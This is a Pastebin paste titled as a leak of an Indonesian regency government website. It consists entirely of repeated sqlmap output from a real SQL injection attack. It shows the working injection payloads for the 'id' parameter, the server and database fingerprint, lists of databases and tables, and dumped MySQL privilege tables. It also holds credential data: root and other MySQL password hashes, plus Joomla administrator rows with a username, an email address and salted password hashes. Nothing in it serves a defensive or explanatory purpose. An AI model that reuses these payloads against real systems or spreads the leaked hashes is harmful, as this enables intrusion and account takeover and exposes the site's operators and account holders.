API tools faq
paste
RussX9

www.dairikab.go.id leaked

RussX9
Aug 29th, 2014
414
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.14 KB | None | 0 0
raw download clone embed print report
  1. sqlmap identified the following injection points with a total of 56 HTTP(s) requests:
  2. ---
  3. Place: GET
  4. Parameter: id
  5. Type: boolean-based blind
  6. Title: AND boolean-based blind - WHERE or HAVING clause
  7. Payload: id=195 AND 2625=2625
  8.  
  9. Type: UNION query
  10. Title: MySQL UNION query (NULL) - 7 columns
  11. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  12.  
  13. Type: AND/OR time-based blind
  14. Title: MySQL > 5.0.11 AND time-based blind
  15. Payload: id=195 AND SLEEP(5)
  16. ---
  17. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  18. web application technology: Apache 2.2.22, PHP 5.3.10
  19. back-end DBMS: MySQL 5.0.11
  20. available databases [10]:
  21. [*] dairikab_portal2012
  22. [*] dinkes
  23. [*] disdik
  24. [*] distan
  25. [*] information_schema
  26. [*] kpptdairi
  27. [*] mysql
  28. [*] performance_schema
  29. [*] postfix
  30. [*] test
  31.  
  32. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  33. ---
  34. Place: GET
  35. Parameter: id
  36. Type: boolean-based blind
  37. Title: AND boolean-based blind - WHERE or HAVING clause
  38. Payload: id=195 AND 2625=2625
  39.  
  40. Type: UNION query
  41. Title: MySQL UNION query (NULL) - 7 columns
  42. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  43.  
  44. Type: AND/OR time-based blind
  45. Title: MySQL > 5.0.11 AND time-based blind
  46. Payload: id=195 AND SLEEP(5)
  47. ---
  48. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  49. web application technology: Apache 2.2.22, PHP 5.3.10
  50. back-end DBMS: MySQL 5.0.11
  51. Database: mysql
  52. [24 tables]
  53. +---------------------------+
  54. | user |
  55. | columns_priv |
  56. | db |
  57. | event |
  58. | func |
  59. | general_log |
  60. | help_category |
  61. | help_keyword |
  62. | help_relation |
  63. | help_topic |
  64. | host |
  65. | ndb_binlog_index |
  66. | plugin |
  67. | proc |
  68. | procs_priv |
  69. | proxies_priv |
  70. | servers |
  71. | slow_log |
  72. | tables_priv |
  73. | time_zone |
  74. | time_zone_leap_second |
  75. | time_zone_name |
  76. | time_zone_transition |
  77. | time_zone_transition_type |
  78. +---------------------------+
  79.  
  80. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  81. ---
  82. Place: GET
  83. Parameter: id
  84. Type: boolean-based blind
  85. Title: AND boolean-based blind - WHERE or HAVING clause
  86. Payload: id=195 AND 2625=2625
  87.  
  88. Type: UNION query
  89. Title: MySQL UNION query (NULL) - 7 columns
  90. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  91.  
  92. Type: AND/OR time-based blind
  93. Title: MySQL > 5.0.11 AND time-based blind
  94. Payload: id=195 AND SLEEP(5)
  95. ---
  96. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  97. web application technology: Apache 2.2.22, PHP 5.3.10
  98. back-end DBMS: MySQL 5.0.11
  99. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  100. ---
  101. Place: GET
  102. Parameter: id
  103. Type: boolean-based blind
  104. Title: AND boolean-based blind - WHERE or HAVING clause
  105. Payload: id=195 AND 2625=2625
  106.  
  107. Type: UNION query
  108. Title: MySQL UNION query (NULL) - 7 columns
  109. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  110.  
  111. Type: AND/OR time-based blind
  112. Title: MySQL > 5.0.11 AND time-based blind
  113. Payload: id=195 AND SLEEP(5)
  114. ---
  115. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  116. web application technology: Apache 2.2.22, PHP 5.3.10
  117. back-end DBMS: MySQL 5.0.11
  118. available databases [10]:
  119. [*] dairikab_portal2012
  120. [*] dinkes
  121. [*] disdik
  122. [*] distan
  123. [*] information_schema
  124. [*] kpptdairi
  125. [*] mysql
  126. [*] performance_schema
  127. [*] postfix
  128. [*] test
  129.  
  130. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  131. ---
  132. Place: GET
  133. Parameter: id
  134. Type: boolean-based blind
  135. Title: AND boolean-based blind - WHERE or HAVING clause
  136. Payload: id=195 AND 2625=2625
  137.  
  138. Type: UNION query
  139. Title: MySQL UNION query (NULL) - 7 columns
  140. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  141.  
  142. Type: AND/OR time-based blind
  143. Title: MySQL > 5.0.11 AND time-based blind
  144. Payload: id=195 AND SLEEP(5)
  145. ---
  146. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  147. web application technology: Apache 2.2.22, PHP 5.3.10
  148. back-end DBMS: MySQL 5.0.11
  149. Database: kpptdairi
  150. [52 tables]
  151. +---------------------------------------+
  152. | jos_banner |
  153. | jos_bannerclient |
  154. | jos_bannertrack |
  155. | jos_categories |
  156. | jos_components |
  157. | jos_contact_details |
  158. | jos_content |
  159. | jos_content_frontpage |
  160. | jos_content_rating |
  161. | jos_core_acl_aro |
  162. | jos_core_acl_aro_groups |
  163. | jos_core_acl_aro_map |
  164. | jos_core_acl_aro_sections |
  165. | jos_core_acl_groups_aro_map |
  166. | jos_core_log_items |
  167. | jos_core_log_searches |
  168. | jos_groups |
  169. | jos_menu |
  170. | jos_menu_types |
  171. | jos_messages |
  172. | jos_messages_cfg |
  173. | jos_migration_backlinks |
  174. | jos_modules |
  175. | jos_modules_menu |
  176. | jos_newsfeeds |
  177. | jos_phocagallery |
  178. | jos_phocagallery_categories |
  179. | jos_phocagallery_comments |
  180. | jos_phocagallery_img_comments |
  181. | jos_phocagallery_img_votes |
  182. | jos_phocagallery_img_votes_statistics |
  183. | jos_phocagallery_user |
  184. | jos_phocagallery_votes |
  185. | jos_phocagallery_votes_statistics |
  186. | jos_plugins |
  187. | jos_poll_data |
  188. | jos_poll_date |
  189. | jos_poll_menu |
  190. | jos_polls |
  191. | jos_redirection |
  192. | jos_sections |
  193. | jos_sefexts |
  194. | jos_session |
  195. | jos_sh404SEF_meta |
  196. | jos_sh404sef_aliases |
  197. | jos_sh404sef_pageids |
  198. | jos_stats_agents |
  199. | jos_templates_menu |
  200. | jos_users |
  201. | jos_vvcounter_logs |
  202. | jos_weblinks |
  203. | jos_wf_profiles |
  204. +---------------------------------------+
  205.  
  206. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  207. ---
  208. Place: GET
  209. Parameter: id
  210. Type: boolean-based blind
  211. Title: AND boolean-based blind - WHERE or HAVING clause
  212. Payload: id=195 AND 2625=2625
  213.  
  214. Type: UNION query
  215. Title: MySQL UNION query (NULL) - 7 columns
  216. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  217.  
  218. Type: AND/OR time-based blind
  219. Title: MySQL > 5.0.11 AND time-based blind
  220. Payload: id=195 AND SLEEP(5)
  221. ---
  222. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  223. web application technology: Apache 2.2.22, PHP 5.3.10
  224. back-end DBMS: MySQL 5.0.11
  225. Database: mysql
  226. [24 tables]
  227. +---------------------------+
  228. | user |
  229. | columns_priv |
  230. | db |
  231. | event |
  232. | func |
  233. | general_log |
  234. | help_category |
  235. | help_keyword |
  236. | help_relation |
  237. | help_topic |
  238. | host |
  239. | ndb_binlog_index |
  240. | plugin |
  241. | proc |
  242. | procs_priv |
  243. | proxies_priv |
  244. | servers |
  245. | slow_log |
  246. | tables_priv |
  247. | time_zone |
  248. | time_zone_leap_second |
  249. | time_zone_name |
  250. | time_zone_transition |
  251. | time_zone_transition_type |
  252. +---------------------------+
  253.  
  254. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  255. ---
  256. Place: GET
  257. Parameter: id
  258. Type: boolean-based blind
  259. Title: AND boolean-based blind - WHERE or HAVING clause
  260. Payload: id=195 AND 2625=2625
  261.  
  262. Type: UNION query
  263. Title: MySQL UNION query (NULL) - 7 columns
  264. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  265.  
  266. Type: AND/OR time-based blind
  267. Title: MySQL > 5.0.11 AND time-based blind
  268. Payload: id=195 AND SLEEP(5)
  269. ---
  270. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  271. web application technology: Apache 2.2.22, PHP 5.3.10
  272. back-end DBMS: MySQL 5.0.11
  273. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  274. ---
  275. Place: GET
  276. Parameter: id
  277. Type: boolean-based blind
  278. Title: AND boolean-based blind - WHERE or HAVING clause
  279. Payload: id=195 AND 2625=2625
  280.  
  281. Type: UNION query
  282. Title: MySQL UNION query (NULL) - 7 columns
  283. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  284.  
  285. Type: AND/OR time-based blind
  286. Title: MySQL > 5.0.11 AND time-based blind
  287. Payload: id=195 AND SLEEP(5)
  288. ---
  289. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  290. web application technology: Apache 2.2.22, PHP 5.3.10
  291. back-end DBMS: MySQL 5.0.11
  292. Database: mysql
  293. Table: db
  294. [6 entries]
  295. +----------+-------------+------------+-----------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+----------------+-----------------+------------------+------------------+--------------------+---------------------+-----------------------+
  296. | Db | Host | User | Drop_priv | Grant_priv | Alter_priv | Index_priv | Event_priv | Create_priv | Insert_priv | Select_priv | Update_priv | Delete_priv | Execute_priv | Trigger_priv | Show_view_priv | References_priv | Create_view_priv | Lock_tables_priv | Alter_routine_priv | Create_routine_priv | Create_tmp_table_priv |
  297. +----------+-------------+------------+-----------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+----------------+-----------------+------------------+------------------+--------------------+---------------------+-----------------------+
  298. | test | % | <blank> | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | Y | Y |
  299. | test\\_% | % | <blank> | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | N | Y | Y |
  300. | mail | localhost\n | mailadmin | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y |
  301. | postfix | localhost | emailadmin | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y |
  302. | postfix | 127.0.0.1 | emailadmin | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y |
  303. | kppt | localhost | terpadu | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y |
  304. +----------+-------------+------------+-----------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+----------------+-----------------+------------------+------------------+--------------------+---------------------+-----------------------+
  305.  
  306. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  307. ---
  308. Place: GET
  309. Parameter: id
  310. Type: boolean-based blind
  311. Title: AND boolean-based blind - WHERE or HAVING clause
  312. Payload: id=195 AND 2625=2625
  313.  
  314. Type: UNION query
  315. Title: MySQL UNION query (NULL) - 7 columns
  316. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  317.  
  318. Type: AND/OR time-based blind
  319. Title: MySQL > 5.0.11 AND time-based blind
  320. Payload: id=195 AND SLEEP(5)
  321. ---
  322. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  323. web application technology: Apache 2.2.22, PHP 5.3.10
  324. back-end DBMS: MySQL 5.0.11
  325. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  326. ---
  327. Place: GET
  328. Parameter: id
  329. Type: boolean-based blind
  330. Title: AND boolean-based blind - WHERE or HAVING clause
  331. Payload: id=195 AND 2625=2625
  332.  
  333. Type: UNION query
  334. Title: MySQL UNION query (NULL) - 7 columns
  335. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  336.  
  337. Type: AND/OR time-based blind
  338. Title: MySQL > 5.0.11 AND time-based blind
  339. Payload: id=195 AND SLEEP(5)
  340. ---
  341. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  342. web application technology: Apache 2.2.22, PHP 5.3.10
  343. back-end DBMS: MySQL 5.0.11
  344. Database: dairikab_portal2012
  345. [23 tables]
  346. +----------------+
  347. | 3pilar |
  348. | agenda |
  349. | content |
  350. | content_item |
  351. | ekonomi_desc |
  352. | ekonomi_header |
  353. | ekonomi_menu |
  354. | foto |
  355. | galeri |
  356. | image_slider |
  357. | kecamatan |
  358. | lelang |
  359. | menu_item |
  360. | menu_kategori |
  361. | perda |
  362. | poll_check |
  363. | poll_data |
  364. | poll_desc |
  365. | ref_sembako |
  366. | sembako_trans |
  367. | skpd_cat |
  368. | skpd_item |
  369. | video |
  370. +----------------+
  371.  
  372. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  373. ---
  374. Place: GET
  375. Parameter: id
  376. Type: boolean-based blind
  377. Title: AND boolean-based blind - WHERE or HAVING clause
  378. Payload: id=195 AND 2625=2625
  379.  
  380. Type: UNION query
  381. Title: MySQL UNION query (NULL) - 7 columns
  382. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  383.  
  384. Type: AND/OR time-based blind
  385. Title: MySQL > 5.0.11 AND time-based blind
  386. Payload: id=195 AND SLEEP(5)
  387. ---
  388. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  389. web application technology: Apache 2.2.22, PHP 5.3.10
  390. back-end DBMS: MySQL 5.0.11
  391. Database: dinkes
  392. [56 tables]
  393. +---------------------------------------+
  394. | jos_acepolls_options |
  395. | jos_acepolls_polls |
  396. | jos_acepolls_votes |
  397. | jos_banner |
  398. | jos_bannerclient |
  399. | jos_bannertrack |
  400. | jos_categories |
  401. | jos_components |
  402. | jos_contact_details |
  403. | jos_content |
  404. | jos_content_frontpage |
  405. | jos_content_rating |
  406. | jos_core_acl_aro |
  407. | jos_core_acl_aro_groups |
  408. | jos_core_acl_aro_map |
  409. | jos_core_acl_aro_sections |
  410. | jos_core_acl_groups_aro_map |
  411. | jos_core_log_items |
  412. | jos_core_log_searches |
  413. | jos_groups |
  414. | jos_menu |
  415. | jos_menu_types |
  416. | jos_messages |
  417. | jos_messages_cfg |
  418. | jos_migration_backlinks |
  419. | jos_modules |
  420. | jos_modules_menu |
  421. | jos_newsfeeds |
  422. | jos_phocagallery |
  423. | jos_phocagallery_categories |
  424. | jos_phocagallery_comments |
  425. | jos_phocagallery_img_comments |
  426. | jos_phocagallery_img_votes |
  427. | jos_phocagallery_img_votes_statistics |
  428. | jos_phocagallery_user |
  429. | jos_phocagallery_votes |
  430. | jos_phocagallery_votes_statistics |
  431. | jos_plugins |
  432. | jos_poll_data |
  433. | jos_poll_date |
  434. | jos_poll_menu |
  435. | jos_polls |
  436. | jos_redirection |
  437. | jos_rokcandy |
  438. | jos_sections |
  439. | jos_sefexts |
  440. | jos_session |
  441. | jos_sh404SEF_meta |
  442. | jos_sh404sef_aliases |
  443. | jos_sh404sef_pageids |
  444. | jos_stats_agents |
  445. | jos_templates_menu |
  446. | jos_users |
  447. | jos_vvcounter_logs |
  448. | jos_weblinks |
  449. | jos_wf_profiles |
  450. +---------------------------------------+
  451.  
  452. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  453. ---
  454. Place: GET
  455. Parameter: id
  456. Type: boolean-based blind
  457. Title: AND boolean-based blind - WHERE or HAVING clause
  458. Payload: id=195 AND 2625=2625
  459.  
  460. Type: UNION query
  461. Title: MySQL UNION query (NULL) - 7 columns
  462. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  463.  
  464. Type: AND/OR time-based blind
  465. Title: MySQL > 5.0.11 AND time-based blind
  466. Payload: id=195 AND SLEEP(5)
  467. ---
  468. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  469. web application technology: Apache 2.2.22, PHP 5.3.10
  470. back-end DBMS: MySQL 5.0.11
  471. Database: mysql
  472. Table: user
  473. [10 entries]
  474. +-------------+------------+---------+-------------------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+--------------------+---------------------+----------------------+-----------------------+-----------------------+------------------------+
  475. | Host | User | plugin | Password | ssl_type | Drop_priv | File_priv | Grant_priv | Super_priv | Alter_priv | ssl_cipher | Index_priv | Event_priv | Create_priv | max_updates | Reload_priv | Delete_priv | Insert_priv | x509_issuer | Select_priv | Update_priv | Execute_priv | Show_db_priv | x509_subject | Process_priv | Trigger_priv | Shutdown_priv | max_questions | Show_view_priv | max_connections | Repl_slave_priv | References_priv | Repl_client_priv | Create_user_priv | Create_view_priv | Lock_tables_priv | Alter_routine_priv | Create_routine_priv | max_user_connections | authentication_string | Create_tmp_table_priv | Create_tablespace_priv |
  476. +-------------+------------+---------+-------------------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+--------------------+---------------------+----------------------+-----------------------+-----------------------+------------------------+
  477. | localhost | root | <blank> | *613C56008FF62C0CFE5BC3D9CA1396E627BE3E6B | <blank> | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | Y | Y | <blank> | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | 0 | Y | Y | Y | Y | Y | Y | Y | Y | 0 | <blank> | Y | Y |
  478. | webdairikab | root | <blank> | *613C56008FF62C0CFE5BC3D9CA1396E627BE3E6B | <blank> | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | Y | Y | <blank> | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | 0 | Y | Y | Y | Y | Y | Y | Y | Y | 0 | <blank> | Y | Y |
  479. | 127.0.0.1 | root | <blank> | *613C56008FF62C0CFE5BC3D9CA1396E627BE3E6B | <blank> | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | Y | Y | <blank> | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | 0 | Y | Y | Y | Y | Y | Y | Y | Y | 0 | <blank> | Y | Y |
  480. | ::1 | root | <blank> | *613C56008FF62C0CFE5BC3D9CA1396E627BE3E6B | <blank> | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | Y | Y | <blank> | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | 0 | Y | Y | Y | Y | Y | Y | Y | Y | 0 | <blank> | Y | Y |
  481. | 127.0.0.1 | emailadmin | <blank> | *D4F33113BE36D71D7A85118B27A526021C123C76 | <blank> | N | N | N | N | N | <blank> | N | N | N | 0 | N | N | N | <blank> | N | N | N | N | <blank> | N | N | N | 0 | N | 0 | N | N | N | N | N | N | N | N | 0 | NULL | N | N |
  482. | webdairikab | <blank> | <blank> | <blank> | <blank> | N | N | N | N | N | <blank> | N | N | N | 0 | N | N | N | <blank> | N | N | N | N | <blank> | N | N | N | 0 | N | 0 | N | N | N | N | N | N | N | N | 0 | NULL | N | N |
  483. | localhost | debian, | <blank> | *AA5CA9FD1D6D5F22B66F8D4ADF11948B6FEEDBCD | <blank> | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | Y | Y | <blank> | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | 0 | Y | Y | Y | Y | Y | Y | Y | Y | <blank> | 0 | Y | N |
  484. | localhost | emailadmin | <blank> | *D4F33113BE36D71D7A85118B27A526021C123C76 | <blank> | N | N | Y | N | N | <blank> | N | N | N | 0 | N | N | N | <blank> | N | N | N | N | <blank> | N | N | N | 0 | N | 0 | N | N | N | N | N | N | N | N | 0 | NULL | N | N |
  485. | localhost\n | mailadmin | <blank> | <blank> | <blank> | N | N | N | N | N | <blank> | N | N | N | 0 | N | N | N | <blank> | N | N | N | N | <blank> | N | N | N | 0 | N | 0 | N | N | N | N | N | N | N | N | 0 | NULL | N | N |
  486. | localhost | terpadu | <blank> | *48010F47021B4CEE84E03785DF34FBDE3DD530D5 | <blank> | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | Y | Y | <blank> | Y | Y | Y | Y | <blank> | Y | Y | Y | 0 | Y | 0 | Y | Y | Y | Y | Y | Y | Y | Y | 0 | NULL | Y | Y |
  487. +-------------+------------+---------+-------------------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+--------------------+---------------------+----------------------+-----------------------+-----------------------+------------------------+
  488.  
  489. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  490. ---
  491. Place: GET
  492. Parameter: id
  493. Type: boolean-based blind
  494. Title: AND boolean-based blind - WHERE or HAVING clause
  495. Payload: id=195 AND 2625=2625
  496.  
  497. Type: UNION query
  498. Title: MySQL UNION query (NULL) - 7 columns
  499. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  500.  
  501. Type: AND/OR time-based blind
  502. Title: MySQL > 5.0.11 AND time-based blind
  503. Payload: id=195 AND SLEEP(5)
  504. ---
  505. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  506. web application technology: Apache 2.2.22, PHP 5.3.10
  507. back-end DBMS: MySQL 5.0.11
  508. Database: kpptdairi
  509. [52 tables]
  510. +---------------------------------------+
  511. | jos_banner |
  512. | jos_bannerclient |
  513. | jos_bannertrack |
  514. | jos_categories |
  515. | jos_components |
  516. | jos_contact_details |
  517. | jos_content |
  518. | jos_content_frontpage |
  519. | jos_content_rating |
  520. | jos_core_acl_aro |
  521. | jos_core_acl_aro_groups |
  522. | jos_core_acl_aro_map |
  523. | jos_core_acl_aro_sections |
  524. | jos_core_acl_groups_aro_map |
  525. | jos_core_log_items |
  526. | jos_core_log_searches |
  527. | jos_groups |
  528. | jos_menu |
  529. | jos_menu_types |
  530. | jos_messages |
  531. | jos_messages_cfg |
  532. | jos_migration_backlinks |
  533. | jos_modules |
  534. | jos_modules_menu |
  535. | jos_newsfeeds |
  536. | jos_phocagallery |
  537. | jos_phocagallery_categories |
  538. | jos_phocagallery_comments |
  539. | jos_phocagallery_img_comments |
  540. | jos_phocagallery_img_votes |
  541. | jos_phocagallery_img_votes_statistics |
  542. | jos_phocagallery_user |
  543. | jos_phocagallery_votes |
  544. | jos_phocagallery_votes_statistics |
  545. | jos_plugins |
  546. | jos_poll_data |
  547. | jos_poll_date |
  548. | jos_poll_menu |
  549. | jos_polls |
  550. | jos_redirection |
  551. | jos_sections |
  552. | jos_sefexts |
  553. | jos_session |
  554. | jos_sh404SEF_meta |
  555. | jos_sh404sef_aliases |
  556. | jos_sh404sef_pageids |
  557. | jos_stats_agents |
  558. | jos_templates_menu |
  559. | jos_users |
  560. | jos_vvcounter_logs |
  561. | jos_weblinks |
  562. | jos_wf_profiles |
  563. +---------------------------------------+
  564.  
  565. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  566. ---
  567. Place: GET
  568. Parameter: id
  569. Type: boolean-based blind
  570. Title: AND boolean-based blind - WHERE or HAVING clause
  571. Payload: id=195 AND 2625=2625
  572.  
  573. Type: UNION query
  574. Title: MySQL UNION query (NULL) - 7 columns
  575. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  576.  
  577. Type: AND/OR time-based blind
  578. Title: MySQL > 5.0.11 AND time-based blind
  579. Payload: id=195 AND SLEEP(5)
  580. ---
  581. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  582. web application technology: Apache 2.2.22, PHP 5.3.10
  583. back-end DBMS: MySQL 5.0.11
  584. Database: kpptdairi
  585. Table: jos_poll_data
  586. [0 entries]
  587. +----+--------+------+------+
  588. | id | pollid | text | hits |
  589. +----+--------+------+------+
  590. +----+--------+------+------+
  591.  
  592. Database: kpptdairi
  593. Table: jos_phocagallery_img_comments
  594. [0 entries]
  595. +----+-------+--------+-------+--------+--------+---------+----------+-----------+-------------+------------------+
  596. | id | imgid | userid | title | date | params | comment | ordering | published | checked_out | checked_out_time |
  597. +----+-------+--------+-------+--------+--------+---------+----------+-----------+-------------+------------------+
  598. +----+-------+--------+-------+--------+--------+---------+----------+-----------+-------------+------------------+
  599.  
  600. Database: kpptdairi
  601. Table: jos_content
  602. [0 entries]
  603. +------------+
  604. | fulltext |
  605. +------------+
  606. +------------+
  607.  
  608. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  609. ---
  610. Place: GET
  611. Parameter: id
  612. Type: boolean-based blind
  613. Title: AND boolean-based blind - WHERE or HAVING clause
  614. Payload: id=195 AND 2625=2625
  615.  
  616. Type: UNION query
  617. Title: MySQL UNION query (NULL) - 7 columns
  618. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  619.  
  620. Type: AND/OR time-based blind
  621. Title: MySQL > 5.0.11 AND time-based blind
  622. Payload: id=195 AND SLEEP(5)
  623. ---
  624. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  625. web application technology: Apache 2.2.22, PHP 5.3.10
  626. back-end DBMS: MySQL 5.0.11
  627. Database: dinkes
  628. Table: jos_users
  629. [1 entry]
  630. +----+-----+---------------+---------------+-------+---------+----------+-------------------------------------------------------------------+---------------------+-----------+------------+---------------------+---------------------+
  631. | id | gid | name | email | block | params | username | password | usertype | sendEmail | activation | registerDate | lastvisitDate |
  632. +----+-----+---------------+---------------+-------+---------+----------+-------------------------------------------------------------------+---------------------+-----------+------------+---------------------+---------------------+
  633. | 62 | 25 | Administrator | ray@yahoo.com | 0 | <blank> | admin | 550c6503ff61cfa4829b48fe4d86b496:i5pRTsXZNDsaRqPepCIFsswzw8wJNjZ1 | Super Administrator | 1 | <blank> | 2013-12-18 17:07:37 | 2013-12-22 09:10:49 |
  634. +----+-----+---------------+---------------+-------+---------+----------+-------------------------------------------------------------------+---------------------+-----------+------------+---------------------+---------------------+
  635.  
  636. Database: kpptdairi
  637. Table: jos_users
  638. [1 entry]
  639. +----+-----+---------------+---------------+-------+---------+----------+-------------------------------------------------------------------+---------------------+-----------+------------+---------------------+---------------------+
  640. | id | gid | name | email | block | params | username | password | usertype | sendEmail | activation | registerDate | lastvisitDate |
  641. +----+-----+---------------+---------------+-------+---------+----------+-------------------------------------------------------------------+---------------------+-----------+------------+---------------------+---------------------+
  642. | 62 | 25 | Administrator | ray@yahoo.com | 0 | <blank> | admin | 2ed0e95f002b48de21743e814ed61584:h1JkiocgRF7homi2KBWhk71mZPTXNauv | Super Administrator | 1 | <blank> | 2013-12-09 13:51:40 | 2014-04-04 04:16:43 |
  643. +----+-----+---------------+---------------+-------+---------+----------+-------------------------------------------------------------------+---------------------+-----------+------------+---------------------+---------------------+
  644.  
  645. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  646. ---
  647. Place: GET
  648. Parameter: id
  649. Type: boolean-based blind
  650. Title: AND boolean-based blind - WHERE or HAVING clause
  651. Payload: id=195 AND 2625=2625
  652.  
  653. Type: UNION query
  654. Title: MySQL UNION query (NULL) - 7 columns
  655. Payload: id=195 UNION ALL SELECT NULL,NULL,CONCAT(0x7166717871,0x63646262746f7a59724e,0x7166687871),NULL,NULL,NULL,NULL#
  656.  
  657. Type: AND/OR time-based blind
  658. Title: MySQL > 5.0.11 AND time-based blind
  659. Payload: id=195 AND SLEEP(5)
  660. ---
  661. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  662. web application technology: Apache 2.2.22, PHP 5.3.10
  663. back-end DBMS: MySQL 5.0.11
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!